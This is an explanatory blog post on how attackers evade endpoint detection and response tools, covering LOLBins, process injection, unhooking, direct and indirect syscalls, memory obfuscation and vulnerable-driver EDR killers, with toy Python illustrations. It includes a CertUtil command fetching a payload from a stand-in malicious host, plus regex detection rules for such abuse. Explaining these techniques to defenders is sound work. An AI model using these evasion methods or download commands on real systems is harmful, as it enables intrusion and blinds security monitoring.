Endpoint Detection and Response (EDR) solutions are the cyber sentinels on our endpoints — vigilant guards that monitor system behavior, ready to pounce on anything malicious. Yet attackers are a crafty bunch. Over the past few years, they’ve developed an array of stealthy tricks to bypass, blind, or confuse EDRs, effectively playing a high-tech game of hide-and-seek with defenders. In this post, we’ll explore how attackers ghost past EDR defenses. We’ll start with a brief overview of major evasion categories (perfect for a quick read by IT managers), then dive deep into the technical rabbit hole of each evasion technique. Along the way, we’ll mention real-world tools, malware, and threat actor tactics. Finally, we’ll discuss how organizations can harden their systems and improve detection to stay ahead in this cat-and-mouse game.
Living off the Land (LOLBins): Attackers often misuse legitimate system tools — dubbed LOLBins — to perform malicious actions. By using trusted programs like PowerShell, WMI, rundll32.exe, or CertUtil.exe, they blend into normal system activity and avoid raising red flags. It’s like an intruder using the building’s own service elevator instead of breaking a window – much harder to spot.
Code Injection and Process Hollowing: Why run a malicious program in the open when you can hide it inside a legitimate process? Attackers inject their code into common processes (think explorer.exe or svchost.exe) so that EDR sees only the innocent host process running. Variants include process hollowing (starting a legit process then replacing its insides with malware) and other skullduggery to make malicious threads look like they belong.
User-Mode Hook Bypass (Unhooking & Direct Syscalls): EDRs often hook key Windows API functions to monitor suspicious calls. Attackers counter this by unhooking those functions or bypassing them. They’ll restore the original bytes of hooked functions — erasing the EDR’s “tap” on that function — to nullify the EDR’s visibility and slip their calls through unnoticed. Others avoid calling hooked APIs altogether, instead invoking system calls directly or via “indirect syscalls” to evade user-land hooks. In short, they outmaneuver the EDR’s watcher, making their activity effectively invisible to that mechanism.
In-Memory Evasion and Obfuscation: Modern malware often runs filelessly — loaded directly in memory — and uses obfuscation and encryption to hide its code. This means less evidence on disk for EDR to scan. Attackers encrypt or pack their payloads and only decrypt them in memory at the last moment. Some malware even stays encrypted during idle periods (e.g. Cobalt Strike’s beacon can “sleep” in an obfuscated state) to avoid memory scans. Additionally, copious use of junk code, scrambled strings, and other smoke-and-mirrors techniques make it hard for an EDR to recognize malicious code patterns.
EDR Tampering and Disabling (Going for the Jugular): If all else fails, attackers may try to disable the EDR itself. With sufficient privileges, they might unload or kill EDR processes, often by exploiting vulnerable drivers or OS mechanisms. In recent years, the “Bring Your Own Vulnerable Driver” (BYOVD) trick has emerged: attackers install a legitimately signed but flawed driver and exploit it to get kernel-level powers, then terminate or cripple the EDR from that high ground. There have even been “EDR killer” tools in the wild (yes, that’s as direct as it sounds) used by ransomware groups to knock out endpoint protection and clear the way for payloads.
Those are the high-level themes. Now, let’s break out the cloak-and-dagger toolkit and examine each category in depth — including examples from the real world and what makes these tricks tick.
One of the strategies attackers use is “living off the land”, which means abusing the legitimate, built-in tools of the operating system to do their bidding. Why craft a custom malware tool for, say, downloading a file or launching a script when Windows will happily do it for you with a trusted binary? By using these Living Off the Land Binaries (LOLBins), attackers hide under the guise of normal activity.
EDR systems certainly can flag misuse of legitimate tools, but it’s challenging. These binaries (signed by Microsoft and part of the OS) are usually whitelisted or at least not outright blocked. If an EDR sees powershell.exe running, it can’t just panic – admins and apps use PowerShell for all sorts of benign tasks. Similarly, wmic.exe might be executing a WMI query, or rundll32.exe might be loading a necessary DLL. Attackers exploit this trust. They run their malicious commands or scripts through these trusted hosts, making the malicious behavior look like everyday administration.
Example: Instead of using a custom downloader, an attacker might run: CertUtil.exe -urlcache -split -f http://malicious.site/payload.exe C:\Temp\payload.exe. To the uninformed eye (or a naive security filter), it’s just CertUtil doing certificate-ish things. In reality, it’s downloading malware. Many EDRs now monitor for CertUtil usage in this manner – it’s a well-known LOLBin for file download – but new or lesser-known LOLBins are discovered regularly. It’s a perpetual cat-and-mouse game: defenders plug one hole, attackers find another trusted tool with “unexpected functionality”.
Attackers have abused an array of LOLBins: PowerShell (for executing encoded malicious scripts in memory), WMI (wmic for execution and persistence), MSHTA (running malicious HTML/JS), Rundll32 (launching malicious code or scripts via DLLs), Regsvr32, InstallUtil, MSBuild, and more. Even humble system utilities like msiexec or bitsadmin have been weaponized. The LOLBAS project catalogs dozens of such binaries. By using them, APT backdoors and commodity loaders alike have achieved stealth, blending into the normal operations of a Windows machine.
- APT29 and Others: Many nation-state actors love LOLBins for stealth. For instance, some campaigns by APT29 reportedly leveraged WMI and PowerShell extensively to execute payloads without touching disk, knowing that these utilities are less likely to be blocked. They essentially script their implants via these native tools, leaving very little custom code for an EDR to latch onto.
- TrickBot & Emotet: These now-infamous malware families (before their disruptions) often used PowerShell or WMI in their infection chains. For example, a phishing document might spawn a hidden PowerShell to pull down the next stage. Since PowerShell is a legitimate admin tool, older security solutions sometimes missed the malicious context. Modern EDRs attempt to inspect the commands passed to PowerShell for malicious content, but attackers respond with heavy obfuscation (PowerShell can encode commands or split them into pieces to confuse detectors).
- Cobalt Strike and C2 frameworks: Post-exploitation toolkits like Cobalt Strike’s Beacon or the open-source Sliver often let operators execute via LOLBins. They have features to run shell commands or spawn processes, so a skillful operator might use rundll32 or regsvr32 to launch malicious code in a way that looks like a benign admin action. The Deimos C2 (an open-source Go-based C2) was demonstrated using LOLBins to drop its agent, highlighting how red teamers (and by extension real attackers) mix these techniques into their playbook.
From an EDR perspective, detecting LOLBin abuse is all about behavioral context. If powershell.exe suddenly starts encoding a huge base64 blob on the command line, or rundll32.exe starts reaching out to the internet, alarms should ring. Leading EDRs apply behavioral analytics and rules: for example, “alert if MSHTA spawns a child process that is abnormal” or “flag any use of CertUtil.exe writing to disk from a URL.” Still, it’s a delicate balance – you don’t want a false positive every time an admin runs a script. Attackers know this and try to make their LOLBin usage blend in, sometimes timing it with normal activity or naming their files and servers to look legitimate.
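To make the rule idea concrete, here is a toy command-line triage function in Python. The patterns and the `triage_command_line` name are invented for illustration, not taken from any real EDR product; production rules also weigh parent process, signer, and timing, not just the command line.

```python
import re

# Toy behavioral rules in the spirit of the examples above.
# Patterns are illustrative, not from any real product.
SUSPICIOUS_PATTERNS = [
    # CertUtil being used as a downloader
    (r"certutil(\.exe)?\s+.*-urlcache\s+.*https?://", "certutil-download"),
    # PowerShell with a long encoded-command blob
    (r"powershell(\.exe)?\s+.*-enc(odedcommand)?\s+[A-Za-z0-9+/=]{40,}", "powershell-encoded"),
    # rundll32 pointed at a URL or inline script
    (r"rundll32(\.exe)?\s+.*(javascript:|https?://)", "rundll32-abuse"),
]

def triage_command_line(cmdline: str):
    """Return the names of any rules the command line trips."""
    hits = []
    for pattern, name in SUSPICIOUS_PATTERNS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            hits.append(name)
    return hits
```

Running the CertUtil example from above through this function flags it as `certutil-download`, while a routine `powershell.exe -File backup.ps1` passes clean, which is exactly the context-over-presence distinction real EDRs aim for.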
The key point: LOLBins let attackers ride on the trust of Windows components. It’s literally hiding in plain sight, using Windows to attack itself. As we’ll discuss later, defending against this requires tight monitoring of how these binaries are used, not just whether they’re used at all.
Why run your malicious code as a separate process (where an EDR might notice a weird new program) when you can inject it into an existing, reputable process? This is the logic behind code injection techniques. The concept has been around for ages, but it remains a staple of EDR evasion in modern attacks. By executing code under the guise of a trusted process, attackers make it much harder for defenders to distinguish malicious threads from normal ones.
Remote Code Injection: The classic variant is when malware uses Windows API calls like OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to write payload code into another process’s memory and run it. For example, malware might inject into explorer.exe (since it’s always running) or into a browser process, then do evil stuff from there. To the EDR’s telemetry, it looks like Explorer suddenly started making network connections or modifying the registry – which might be less suspicious than a random EXE doing it. It’s basically malware wearing the skin of a trusted process.
Process Hollowing: This sub-technique involves starting a new process in a suspended state (often a benign system binary like svchost.exe or notepad.exe), then replacing its memory with malicious code before resuming it. The result: an innocuous process name in the system (maybe Notepad), but all of its code is the attacker’s payload. From the outside, it looks like Notepad is running (perhaps shrugging off why Notepad needs network access or admin rights).
DLL Injection and Reflective Loading: Attackers may also inject by forcing a process to load a malicious DLL. This can be done via adding registry entries (for persistence/injection via AppCertDlls, etc.) or simply using CreateRemoteThread in a target process to call LoadLibrary on a DLL path. A more advanced version is reflective DLL loading, where the DLL code is loaded from memory without ever touching disk – making it “fileless.” Frameworks like PowerShell Empire and Cobalt Strike have long used reflective loaders to avoid dropping files that EDR scanners might catch.
APC Injection and Thread Hijacking: There are exotic techniques like Queue User APC (Asynchronous Procedure Call) injection, where malware queues malicious code to run in the context of another process’s thread (often at a point when the thread enters an alertable state). Or thread hijacking, where an existing thread in a process is paused and its instruction pointer redirected to malicious code (so no new thread appears; an existing one just goes rogue). These techniques are attempts to be even sneakier — injecting code without the straightforward “create remote thread” that EDRs more easily detect.
Process Doppelgänging and Herpaderping: With names seemingly taken from a fantasy novel, these are modern evasion methods that manipulate how Windows spawns processes to confuse security scanners. Process Doppelgänging (discovered around 2017) abuses the Windows Transactional File System to create a process from a tampered file in such a way that the file looks legit on disk, but the process runs malicious code that was never committed to disk — bypassing some AV/EDR file scans. Process Herpaderping (2020) similarly obscures the executable’s true content by messing with how the image is mapped or modified at runtime, so the security products see one thing while the OS executes another. These are advanced techniques and not as widespread, but they show the constant innovation in injection tactics to stay a step ahead of defenses.
It’s safe to say most serious malware in the last decade employs some form of injection. For instance, banking trojans like QakBot or IcedID commonly inject into browser processes or other system processes after they get on a machine — partly to hide, partly to access data in those processes (like your banking website in a browser). The notorious TrickBot trojan similarly would inject into system processes to conceal its theft of credentials and movement in the system.
On the post-exploitation side, Cobalt Strike Beacon is injection-happy by design. Red teamers and attackers using Cobalt Strike will often start with a Beacon in memory (as shellcode), then migrate that Beacon into a safer home — e.g. injecting into dllhost.exe or some Windows service process — using Beacon’s built-in inject command. The open-source Sliver C2 works the same way: its documentation shows using the migrate feature to move the implant into another process for evasion. By hiding the implant inside svchost or another ubiquitous process, the malware hopes the EDR will have a harder time telling the good threads from the bad.
Another example is Meterpreter (the Metasploit Framework’s payload), which by default injects itself into memory of processes to run. Ransomware often injects code into processes like lsass.exe (to dump credentials) or into legitimate system processes to disable things. Basically, if you look at the MITRE ATT&CK technique for Process Injection (T1055), there’s an entire family of sub-techniques and nearly every major threat actor or malware has used one or more of them.
EDRs are quite aware of injection patterns. Basic indicators include: a process opening another process handle with certain access rights, memory being allocated and written to in another process, a thread creation in a process that’s initiated from an external source, etc. Many EDRs will alert if, say, winword.exe (Microsoft Word) spawns a remote thread in svchost.exe – that’s definitely unusual.
However, attackers have counters: some use direct syscalls (which we’ll discuss next) to perform the injection steps, avoiding the high-level Windows APIs that EDR hooks. Others attempt “stack spoofing” or use call hooking to hide the origin of the injection. An interesting detection EDRs now use is checking for threads that start in suspicious memory regions. Normally, a thread in a process starts at a legitimate code section of a loaded module (backed by an EXE or DLL on disk). If an EDR finds a thread whose start address is in a heap or allocated memory (not tied to any module), that’s a red flag — likely injected code. This method is quite effective and used with high confidence by some EDRs.

In response, Cobalt Strike’s latest version (4.11+) actually introduced a new “thread stack spoofing” injection technique as the default, specifically to make injected threads look more legitimate and defeat this detection. It’s an arms race: defenders came up with a great way to catch injected threads, so the attackers (or red team tool developers) found a way to mask the thread start location by leveraging existing code gadgets.
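The module-backed check at the heart of that detection can be sketched in a few lines. The structures below are simplified stand-ins for what an EDR would enumerate from the OS, and the module base addresses are made up:

```python
from dataclasses import dataclass

@dataclass
class ModuleRange:
    name: str
    base: int
    size: int

def is_module_backed(start_address: int, modules: list) -> bool:
    """True if a thread's start address falls inside a loaded module's image."""
    return any(m.base <= start_address < m.base + m.size for m in modules)

# Made-up module ranges standing in for what an EDR enumerates per process.
modules = [
    ModuleRange("ntdll.dll",    0x7FF800000000, 0x1F0000),
    ModuleRange("kernel32.dll", 0x7FF810000000, 0x0C0000),
]

# A thread starting inside ntdll's image is normal; one starting in an
# anonymous heap allocation far from any module is the classic injection tell.
```

Stack spoofing defeats this exact check by making the thread appear to start from (or return through) legitimate module code, which is why it became the new default in offensive tooling.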
One could say, process injection is the art of hiding a wolf in sheep’s clothing. It remains extremely prevalent. EDRs use advanced heuristics to catch it, but skilled attackers continuously refine their methods to blend malicious threads into the crowd of normal execution. It’s a spy vs. spy scenario happening at the memory level of your endpoints.
Modern EDRs do a lot of their magic by monitoring API calls that programs make. They often achieve this via user-mode function hooking — patching key functions (usually in ntdll.dll or other core libraries) to intercept calls like process creation, file writes, network connections, etc., and then deciding if it looks malicious. Think of it as the EDR placing tripwires on all the interesting doors and windows (APIs) that a program might use to do bad things. Naturally, attackers have figured out how to step over or disable those tripwires. Here’s how they do it.
One approach malware uses is to remove the hooks altogether. Since the hooks are just code modifications in the process’s memory, advanced malware can identify them and overwrite them with the original, benign bytes, restoring the function to its clean state. This is typically called API unhooking. By doing so, the malware nullifies the EDR’s visibility on that function call. For example, if an EDR hooked NtAllocateVirtualMemory (to watch for, say, malware allocating RWX memory), the malware can read a clean copy of ntdll.dll from disk and patch the in-memory NtAllocateVirtualMemory bytes back to the clean state, erasing the hook. Now, when it calls that function, it goes straight to the real deal without the EDR’s injected jump, evading the monitor.
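Real unhooking means byte-patching ntdll in process memory, which doesn’t reduce to a few portable lines. But the idea can be caricatured in Python, with a monkey-patched function standing in for a hooked export and a saved reference standing in for the clean on-disk copy (all names here are invented for the sketch):

```python
import types

# A stand-in "API": in reality this would be a function inside ntdll.dll.
api = types.SimpleNamespace()
api.allocate = lambda size: f"allocated {size} bytes"

# Pristine reference, analogous to mapping a clean ntdll.dll from disk.
clean_allocate = api.allocate

calls_seen = []  # the "EDR's" telemetry

def edr_hook(size):
    # The hook records the call, then forwards to the real function.
    calls_seen.append(size)
    return clean_allocate(size)

api.allocate = edr_hook        # EDR installs its hook
api.allocate(64)               # this call is observed

api.allocate = clean_allocate  # "unhooking": restore the original
api.allocate(128)              # this call is now invisible to the EDR
```

After the restore, only the first call ever reached the EDR’s telemetry; the second went straight to the real function, which is exactly the blindness unhooking creates.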
This sounds like a silver bullet, but EDRs aren’t blind to unhooking. Some will periodically verify that their hooks are intact and, if they detect tampering, will re-hook or even terminate the process. (Imagine the guard sees someone disarm the security camera, so he sounds the alarm or fixes it.) Nonetheless, malware has been found doing widespread unhooking. In 2023, a threat group dubbed BlueBravo was observed using a tool (“GraphicalNeutrino”) that unhooked all API hooks in ntdll and wininet modules before proceeding with its payload, precisely to blind the EDR. Red team tools like ScareCrow (an EDR bypass framework) also implement this: ScareCrow will load fresh copies of system DLLs and remove EDR hooks by overwriting the hooked functions with the original bytes, then proceed to run its shellcode without tripping the wires.
Another unhooking trick is manual DLL mapping: the malware doesn’t even bother altering the existing ntdll.dll; instead it loads a second copy of ntdll into memory at a different location (without using Windows’ normal LoadLibrary, to avoid detection). Then it calls all its APIs through this clean copy of the DLL, which the EDR didn’t get a chance to hook. This way, the hooked copy is ignored entirely. The downside is that having two copies of the same DLL in one process is a bit odd and can itself be a giveaway if an EDR is doing a thorough memory scan. But some malware does this for critical functions to stay under the radar.
Even more popular in recent years is the use of direct system calls. Normally, when a program wants to do something kernel-level (like allocate memory, create a process, etc.), it calls a function in ntdll.dll which then invokes a special CPU instruction (syscall) to transition to kernel mode. EDRs place hooks in those ntdll functions. So, attackers say: “Why not skip ntdll entirely and execute the syscall instruction ourselves?” By hardcoding or dynamically obtaining the System Service Number (SSN) for the desired system call, malware can issue the syscall directly from its own code, completely bypassing any hooked API. This is like finding a hidden backdoor straight into the kernel, so you don’t have to go through the front door that’s guarded. Tools like SysWhispers have automated generating code for direct syscalls, and many implants (including Cobalt Strike via its Beacon Object Files and others) have adopted this technique.
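Resolving the SSN is the fiddly part that tools like SysWhispers automate, typically by parsing the clean stub bytes. The byte layout below is the genuine prologue of an unhooked x64 Nt* stub; the SSN value 0x18 is only an example (service numbers vary between Windows builds):

```python
import struct

def extract_ssn(stub: bytes):
    """Parse the System Service Number from a clean x64 Nt* stub.

    An unhooked stub begins:
        mov r10, rcx   -> 4C 8B D1
        mov eax, SSN   -> B8 xx xx xx xx
    Returns None if the prologue doesn't match (e.g. a hook's jmp was planted).
    """
    if len(stub) >= 8 and stub[:3] == b"\x4c\x8b\xd1" and stub[3] == 0xB8:
        return struct.unpack_from("<I", stub, 4)[0]
    return None

# A clean-looking stub whose SSN is 0x18 (NtAllocateVirtualMemory on many
# Windows 10 builds; the number is not stable across versions).
clean_stub = b"\x4c\x8b\xd1\xb8\x18\x00\x00\x00"
hooked_stub = b"\xe9\x10\x20\x30\x40\x00\x00\x00"  # starts with jmp rel32
```

Once the SSN is recovered, the malware can load it into EAX and execute the `syscall` instruction from its own code, never touching the (possibly hooked) ntdll entry point.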
However, EDRs caught on. Such “manual” syscalls are a strong indicator of malicious activity, because normal applications almost never do that (Windows APIs handle it for them). Sophisticated EDRs began watching for calls into the kernel that didn’t originate from ntdll. They can do this by examining the call stack when a system call happens – if the stack doesn’t show the legitimate DLL, it’s suspicious. In fact, some EDRs will log or block outright any syscall that comes from an unexpected memory region. So direct syscalls, while initially a superb bypass, became less foolproof as EDRs adapted.
Enter indirect syscalls — a clever refinement. Attackers noted that EDR hooks typically patch only the first few bytes of the target function but leave the actual syscall instruction in place further down the function body. For instance, a hooked NtReadFile might start with a jump to EDR code, but later in the function it still contains the real syscall instruction. With the indirect syscall technique, the malware sets up the correct registers (particularly the SSN in EAX) and then jumps into the legitimate ntdll function past the hook, landing directly on the syscall instruction. In effect, the code uses the OS’s own syscall mechanism without ever executing the EDR’s patched entry point. The EDR sees a syscall coming from ntdll code, which looks perfectly normal — except the call stack may be a tad shorter than usual. This is far less noisy than manual syscalls.
Malware like Pikabot (a newer banking trojan) has been observed employing indirect syscalls to great effect. Pikabot actually goes further by also heavily obscuring its code flow, but the takeaway is that it “speaks” to Windows kernel in a covert way. As VMRay’s analysis put it, indirect syscalls are a “significant evolution in malware evasion” that complicate detection. Another variant uses a technique fancifully called “Halo’s Gate” (no relation to Bungie’s Halo game…) which finds unhooked system call stubs in ntdll by searching for nearby function opcodes. All these methods aim to do the forbidden actions (allocate memory, spawn processes, etc.) without tripping the user-mode hooks.
One more method to mention is hook detection: Some malware first checks if functions are hooked (by looking for the jump opcode at the start of APIs or other inconsistencies). If hooks are found, the malware might choose a different path — for example, not execute, or attempt an unhook — or use an entirely different set of APIs that it knows aren’t hooked. This is more of a reconnaissance tactic, but it underscores how malware can sense the EDR’s presence. Pikabot, for instance, inspects certain API prologues in memory for signs of hooking. If it finds the telltale JMP from an EDR hook, it knows it’s being watched and adjusts accordingly.
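A minimal sketch of such a prologue check in Python. The detour signatures listed are common inline-hook patterns, but this is a simplification; thorough checks compare the in-memory bytes against a clean copy of the DLL rather than pattern-matching:

```python
# Common detour prologues an inline hook leaves behind (x86/x64).
HOOK_SIGNATURES = [
    b"\xe9",       # jmp rel32
    b"\xff\x25",   # jmp [rip+disp32]
    b"\x68",       # push addr (older push/ret detours)
]

def looks_hooked(prologue: bytes) -> bool:
    """Heuristic: does this API prologue start with a known detour pattern?"""
    return any(prologue.startswith(sig) for sig in HOOK_SIGNATURES)
```

A clean x64 Nt* stub starts with `mov r10, rcx` (0x4C 0x8B 0xD1) and passes this check; a stub whose first byte has been replaced with a jmp does not, telling the malware it is being watched.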
On the offensive tooling side, many implants incorporate these ideas. Cobalt Strike’s Beacon can be configured to use direct/indirect syscalls in its stagers, and recent updates focus on getting around EDR hooks. Brute Ratel, a newer commercial post-exploitation kit, specifically advertises EDR-evasion and likely uses similar techniques under the hood (reports indicate it can perform API calls without detection, suggesting syscall-level tricks). We mentioned ScareCrow earlier — it not only unhooks but also uses its own “syscall-esque” methods to execute shellcode once the hooks are removed. Open-source projects like TitanHide have also experimented with disabling or bypassing userland hooks (TitanHide was more for anti-debugging, but conceptually related).
From the malware/APT side: We saw the BlueBravo APT unhooking in 2023. The Lazarus Group (North Korean APT) in some of their malware have included direct syscall usage and even custom Windows syscalls (trying to fly under the radar of known APIs). Some of their documented tools show checks for EDR hooks and memory patching. Even certain ransomware strains now adopt these techniques for the critical parts of their workflow (like terminating processes or deleting backups) to avoid being blocked.
EDRs, for their part, didn’t just roll over. Aside from call stack inspection for direct syscalls, some moved more of their monitoring into the kernel (where the malware can’t tamper easily). If the EDR can see that any syscalls are being invoked to, say, create a remote thread or allocate RWX memory, it can still respond even if its user-mode component was bypassed. Some EDRs leverage Kernel Callback routines or Event Tracing (ETW) to catch things like process creation, image loading, etc., which can supplement or replace user hooks. There’s also a move toward hardware-based enforcement — for instance, Intel CET (Control-Flow Enforcement) can thwart some of the hook-skipping or return-oriented tricks by preventing unintended control flow, though that’s a broader protection.
Nonetheless, hooking evasion is a game of move-countermove. Today it’s direct and indirect syscalls; if those get too risky, attackers might find yet another pathway. (Some research talks about “syscall proxies” or doing work in trusted processes via hijacking, etc.) The lesson is that user-mode hooks, while useful, can never be fully relied on in the face of a determined adversary — because anything running in user-mode can potentially be seen or altered by the malware itself. Attackers love to remind us: If it’s your code versus mine in the same ring, I can find you and muck things up. EDR developers are thus increasingly focusing on tamper-resistant techniques and layering detection beyond just hooking.
This category is a bit of a grab-bag, but the unifying theme is hiding malicious code from prying eyes, especially by keeping it in memory and making it hard to recognize. As EDRs improved file scanning and reputation checks, attackers shifted heavily toward memory-only or fileless techniques, and toward making their code as confusing as possible to analyze. Think of it like writing a secret message in invisible ink — the content is there, but you need the right reagent (or in our case, decoding) to reveal it. Meanwhile, if anyone glances over it quickly (like an automated scanner), they see nothing intelligible.
Traditional antivirus used to focus heavily on files: if a malicious EXE is on disk, scan it and catch it. EDRs still pay attention to files, but also monitor processes at runtime. To reduce the chance of detection, many modern attacks try to avoid writing their payloads to disk entirely. Instead, they might use a small loader (which could be a script, a macro, or one of those LOLBins) to load the real payload directly into memory. For example, a phishing document might execute a PowerShell command that downloads an encrypted blob and reflects it into memory as shellcode — never dropping an .exe on disk. No file means nothing for file-based scanners to quarantine, and EDRs have to catch it in action. Funnily enough, even in-memory code can get paged out when physical memory runs low — which occasionally leads to signature detections on the page/swap file.
Malware like Cobalt Strike Beacon, Meterpreter, Empire agents, etc., are often injected straight into memory. Even commodity malware droppers have adopted this; e.g., the Trickbot gang’s BazarLoader would reflectively load its DLL payload. Some ransomware affiliates in recent years use frameworks that inject the ransomware payload into memory from a loader script to avoid leaving samples on disk.
While EDRs do watch memory, they often have to rely on behavior (what is the code doing?) rather than simple signatures. Some advanced EDRs perform periodic memory scans looking for known malicious patterns or implants, but this is resource-intensive and not foolproof. Attackers respond by encrypting or disguising their code in memory when it’s not actively executing. A prime example: the sleeping beacon. Cobalt Strike introduced an advanced SleepMask in 2021–2022 that essentially encrypts or garbles the Beacon’s memory footprint when the beacon is in a sleep/dormant state. The moment it wakes to do an action, it quickly decrypts in memory, does its thing, and then re-encrypts itself. If an EDR memory scanner runs while the beacon is sleeping, it hopefully only sees an unintelligible blob, not the telltale patterns of known malicious code. This is essentially on-demand obfuscation in RAM, like a ninja covering his tracks in the sand after every step.
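The masking idea itself is simple. Here is a Python sketch with a stand-in payload buffer; a real sleep mask also walks the implant’s heap allocations, masks them all, and uses a fresh random key each sleep cycle rather than the fixed demo key below:

```python
def xor_mask(buf: bytearray, key: bytes) -> None:
    """XOR the buffer in place; applying the same key twice restores it."""
    for i in range(len(buf)):
        buf[i] ^= key[i % len(key)]

payload = bytearray(b"BEACON CODE AND CONFIG")  # stand-in for implant memory
key = bytes(range(1, 17))                       # demo key; real masks use a fresh random key

xor_mask(payload, key)    # going to sleep: a memory scan now sees only garbage
masked = bytes(payload)   # what a scanner would observe mid-sleep
xor_mask(payload, key)    # waking up: restore, act, then re-mask
```

The window of exposure shrinks to the brief moments the implant is awake and decrypted, which is why some EDRs try to trigger scans exactly when a suspicious process resumes from a long sleep.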
Whether on disk or in memory, malware frequently obfuscates its code and data to avoid recognition. This can involve packing (compressing/encrypting the whole file with a stub that decrypts it at runtime), inserting lots of meaningless junk instructions that do nothing (to throw off disassemblers and heuristics), or encoding strings and configuration so that IoCs are not visible in memory. For instance, a banking trojan might encrypt all its command-and-control server strings in memory and only decrypt right before use, so an EDR can’t simply scan memory for the known bad URL or key phrase.
The earlier-mentioned Pikabot is noted for extensive obfuscation: it pads its code with irrelevant junk and hides strings, making analysis difficult. Many malware creators employ commercial packers or even custom virtual machine-based obfuscators (like the infamous Turla’s PolyCrypt or commercial protectors like Themida) that transform their code into something very hard to statically analyze. While packers are an old topic, they’re still evolving — and some are specifically designed to fool EDRs by, say, chunking the execution so no single piece looks too malicious, or by hiding API calls behind opaque constructs.
In-memory evasion also includes using non-standard languages or runtimes. For example, using .NET or PowerShell in memory (with something like PowerShell’s Add-Type or Reflection.Assembly.Load to execute compiled code) can be trickier for EDRs if they don’t hook .NET runtime calls effectively. Attackers might compile malicious code into memory via scripting to bypass traditional monitoring.
A particularly sneaky trick is memory privilege abuse: some malware allocates memory in a way that EDR user-land agents might not have permission to read (e.g., using page protections or exploiting design issues to fool userland scanners). There have been proofs of concept where malicious code is kept in protected memory regions or in GPU memory to avoid CPU memory scans — though that’s more esoteric.
- Cobalt Strike & Brute Ratel: Both of these have options to encrypt and randomize their payloads in memory. Brute Ratel’s developer explicitly touted it as an EDR evasion toolkit, with malleable characteristics, likely employing heavy obfuscation and dynamic API resolving (so it doesn’t have obvious API call references in static analysis).
- Metasploit Meterpreter: It has staged payloads that are small and then pull in larger encrypted stages. Meterpreter also can reside entirely in memory; when used over an exploit, it never needs a file. It’s older and generally easier to catch now, but it set a precedent.
- APT Malware: Many state-sponsored implants (from Equation Group’s tools to more recent ones like Sliver (used by various threat actors)) are built to be stealthy in memory. APT32 (OceanLotus) had malware that unpacked in multiple stages in memory, each stage decrypted the next — so at no point was the full payload visible until the final moment of execution. And that final stage would often reside in a legitimate process context due to injection.
- Script-based Trojans: Malware like Emotet and Dridex at times used embedded PowerShell or VBA scripts that would load .NET reflective DLLs (for example, using a C# payload that is compiled and loaded on the fly). These leave very little for EDR to latch onto unless it has script scanning (like AMSI for PowerShell, which many attackers also bypass via AMSI hooking patches, a topic in itself).
It’s worth noting that EDRs with memory scanning capability have had successes in catching threats that are essentially invisible on disk. For example, certain fileless miners or in-memory webshells were caught because the EDR noticed a process making weird calls and then scanned memory to find known malicious code fragments. The attackers’ counter to that is what we described — don’t have known fragments (encrypt them, mutate them, hide them behind layers).
Defending against obfuscation is tough — by design, it’s meant to confuse detection. Machine learning and behavioral analytics are the go-to for EDR here: instead of recognizing what the code is, they try to recognize what it’s doing. For instance, an EDR might not recognize a heavily obfuscated PowerShell script by signature, but it can execute it in a sandbox or instrument it to see, ah, it’s trying to inject shellcode into memory — that behavior is bad regardless of how the code is obfuscated. Microsoft’s AMSI (Antimalware Scan Interface) was introduced to help inspect script content at runtime; attackers answered by AMSI patching (in-memory disabling of AMSI). Again, move and countermove.
In-memory evasion and obfuscation is about hiding the needle by either removing the haystack or painting the needle the same color. Attackers remove files from disk (no haystack), and/or they disguise the code (paint the needle) so even if you have it, you don’t know what it is. This is one of the most persistent challenges in endpoint security — distinguishing bad from good when bad looks so much like good except for actual intent.
The most direct route to evading EDR is, bluntly, to incapacitate it. This is the “EDR tampering” or disabling approach. It’s bold and not always easy — many EDR products have self-protection — but if achieved, it’s game over for that endpoint’s defenses. Why play hide-and-seek if you can knock out the guard? In recent years, some attackers, particularly ransomware gangs, have turned to creative (and concerning) methods to do exactly this.
This technique has gained notoriety in the last 2–3 years. The idea: Windows allows drivers (kernel modules) to have near-omnipotent control, but it enforces that drivers must be signed. However, if you can find a legitimately signed driver that has a known vulnerability, you can bring it with you, load it on the target system (since it’s properly signed, Windows won’t refuse), and then exploit that vulnerability to run arbitrary code in kernel mode. From kernel land, you can kill processes or services that even an Administrator can’t normally kill — including EDR processes that might be protected or running as protected services.
The attacker essentially drags Windows’ own security model into a brawl: “You insist on a valid signature? Fine, here’s one — from 2018 with a buggy driver for legitimate software. Now let me use that bug to do nasty things at kernel level.” There’s even a public database of such vulnerable drivers (the LOLDrivers project), meant for defense but equally useful for offense.
Real-world example: In 2023, an attacker known as Spyboy created an “EDR killer” toolkit named Terminator that used BYOVD. It dropped a vulnerable driver (signed by a legitimate certificate) to disk and loaded it, then via that driver issued commands to kill practically every major EDR/AV process on the system. For a few hundred dollars, this tool was sold on crime forums, and it caused a stir because it was effective — until EDR vendors scrambled to block the known drivers and techniques. Another case in mid-2024: a ransomware affiliate associated with the RansomHub group used a tool dubbed EDRKillShifter, which is similarly a loader for vulnerable drivers. It specifically attempted to terminate the Sophos EDR agent by loading a buggy driver and using it to shut down Sophos’s processes. (In that instance, it failed — a testament that defenders are trying to stay ahead — but the mere attempt shows how common this is becoming.)
Even nation-state APTs have done this. The Lazarus Group was reported to abuse a vulnerable Dell hardware driver (dbutil_2_3.sys, CVE-2021-21551) to disable a target’s security software in some of their ops. And a few years back, a ransomware called RobbinHood (unrelated to the stock-trading app) used a Gigabyte driver vulnerability to kill AV processes — one of the earliest uses of BYOVD in ransomware.
Once an attacker has kernel privileges via a driver, not only can they kill processes, they can also straight-up unload the EDR’s kernel driver or stub out its callbacks, essentially neutering it. Some EDRs run parts of their product as “Protected Processes” (PPL) which even admin users can’t kill. But a vulnerable kernel driver doesn’t care about PPL — it can use Windows kernel APIs to terminate or suspend those processes anyway. It’s like getting a master key to the kingdom.
Not all EDR kill attempts require BYOVD, though that’s the most fashionable method. Simpler approaches include trying to stop the EDR service via net stop or changing registry keys – but modern EDRs usually have tamper protection to prevent that (requiring special privileges or a security token to stop them). Some malware has tried to patch or unload EDR user-mode DLLs from their process (if they detect it injected). For example, if an EDR’s user agent DLL is inside the malware’s process to do hooking, the malware might just call FreeLibrary on it or overwrite its code to disable it. EDR vendors counter this by marking their processes and modules as protected or watching for such events.
